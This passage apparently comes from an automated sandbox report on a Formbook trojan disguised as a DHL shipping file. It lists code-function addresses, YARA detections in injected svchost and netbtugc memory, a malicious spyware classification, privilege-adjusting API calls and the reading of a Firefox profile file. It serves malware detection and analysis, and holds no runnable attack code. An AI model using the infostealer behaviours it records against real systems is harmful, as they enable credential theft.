            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F41A21_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035001AA1_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D20001_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034647501_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034407701_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C01_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C6E01_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034405351_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035005911_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F24461_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E44201_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EE4F61_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB401_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F6BD71_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA801_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034569621_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A01_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350A9A61_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344A8401_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428401_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E8F01_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034268B81_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4F401_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03482F281_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460F301_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E2F301_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432FC81_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BEFA01_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440E591_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEE261_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEEDB1_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452E901_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FCE931_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344AD001_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DCD1F1_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343ADE01_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458DBF1_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440C001_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430CF21_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0CB51_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342D34C1_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F132D1_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348739A1_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B2C01_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E12ED1_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345D2F01_2_0345D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034452A01_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347516C1_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342F1721_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350B16B1_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344B1B01_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EF0CC1_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034470C01_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F70E91_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF0E01_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF7B01_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034856301_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F16CC1_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F75711_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035095C31_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD5B01_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034314601_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF43F1_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFB761_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B5BF01_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347DBF91_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FB801_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFA491_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7A461_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B3A6C1_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EDAC61_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DDAAC1_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03485AA01_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E1AA31_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034499501_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B9501_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D59101_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AD8001_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034438E01_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFF091_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD21_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD51_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03441F921_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFFB11_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03449EB01_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03443D401_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F1D5A1_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7D731_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FDC01_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B9C321_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFCF21_2_034FFCF2
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD30A02_2_08DD30A0
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DCE2902_2_08DCE290
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DEBA902_2_08DEBA90
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DCE2872_2_08DCE287
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD4BB02_2_08DD4BB0
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD4BAE2_2_08DD4BAE
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DCE4B02_2_08DCE4B0
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DCC5302_2_08DCC530
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356A3523_2_0356A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035703E63_2_035703E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034BE3F03_2_034BE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035502743_2_03550274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035302C03_2_035302C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035381583_2_03538158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034A01003_2_034A0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0354A1183_2_0354A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035681CC3_2_035681CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035701AA3_2_035701AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035420003_2_03542000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034D47503_2_034D4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B07703_2_034B0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034AC7C03_2_034AC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034CC6E03_2_034CC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B05353_2_034B0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035705913_2_03570591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035624463_2_03562446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0355E4F63_2_0355E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356AB403_2_0356AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03566BD73_2_03566BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034AEA803_2_034AEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034C69623_2_034C6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B29A03_2_034B29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0357A9A63_2_0357A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034BA8403_2_034BA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B28403_2_034B2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034DE8F03_2_034DE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034968B83_2_034968B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03524F403_2_03524F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034F2F283_2_034F2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034D0F303_2_034D0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034A2FC83_2_034A2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0352EFA03_2_0352EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B0E593_2_034B0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356EE263_2_0356EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356EEDB3_2_0356EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356CE933_2_0356CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034C2E903_2_034C2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034BAD003_2_034BAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034AADE03_2_034AADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034C8DBF3_2_034C8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B0C003_2_034B0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034A0CF23_2_034A0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03550CB53_2_03550CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0349D34C3_2_0349D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356132D3_2_0356132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034F739A3_2_034F739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034CB2C03_2_034CB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035512ED3_2_035512ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034CD2F03_2_034CD2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B52A03_2_034B52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034E516C3_2_034E516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0349F1723_2_0349F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0357B16B3_2_0357B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034BB1B03_2_034BB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B70C03_2_034B70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0355F0CC3_2_0355F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356F0E03_2_0356F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035670E93_2_035670E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356F7B03_2_0356F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035616CC3_2_035616CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035675713_2_03567571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0354D5B03_2_0354D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034A14603_2_034A1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356F43F3_2_0356F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356FB763_2_0356FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03525BF03_2_03525BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034EDBF93_2_034EDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034CFB803_2_034CFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03567A463_2_03567A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356FA493_2_0356FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03523A6C3_2_03523A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0355DAC63_2_0355DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034F5AA03_2_034F5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0354DAAC3_2_0354DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B99503_2_034B9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034CB9503_2_034CB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035459103_2_03545910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0351D8003_2_0351D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B38E03_2_034B38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356FF093_2_0356FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03473FD53_2_03473FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03473FD23_2_03473FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B1F923_2_034B1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356FFB13_2_0356FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B9EB03_2_034B9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034B3D403_2_034B3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03561D5A3_2_03561D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03567D733_2_03567D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034CFDC03_2_034CFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03529C323_2_03529C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0356FCF23_2_0356FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B415E03_2_02B415E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B430F03_2_02B430F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B430EE3_2_02B430EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B3C7D03_2_02B3C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B3C7C73_2_02B3C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B3AA703_2_02B3AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B3C9F03_2_02B3C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B59FD03_2_02B59FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333A0AF3_2_0333A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333B9D63_2_0333B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333B8B43_2_0333B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333BD6C3_2_0333BD6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0333ADD83_2_0333ADD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03487E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0349B970 appears 257 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0351EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 034E5130 appears 56 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 034F7E54 appears 96 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0352F290 appears 103 times
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: String function: 00DC0A30 appears 46 times
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: String function: 00DBF9F2 appears 31 times
            Source: DHL 073412182024.exe, 00000000.00000003.1748325241.00000000037E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 073412182024.exe
            Source: DHL 073412182024.exe, 00000000.00000003.1748883552.000000000398D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 073412182024.exe
            Source: DHL 073412182024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@15/7
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E137B5 GetLastError,FormatMessageW,0_2_00E137B5
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E010BF AdjustTokenPrivileges,CloseHandle,0_2_00E010BF
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E016C3
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E151CD
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E2A67C
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00E1648E
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00DA42A2
            Source: C:\Users\user\Desktop\DHL 073412182024.exeFile created: C:\Users\user\AppData\Local\Temp\autDD95.tmpJump to behavior
            Source: DHL 073412182024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
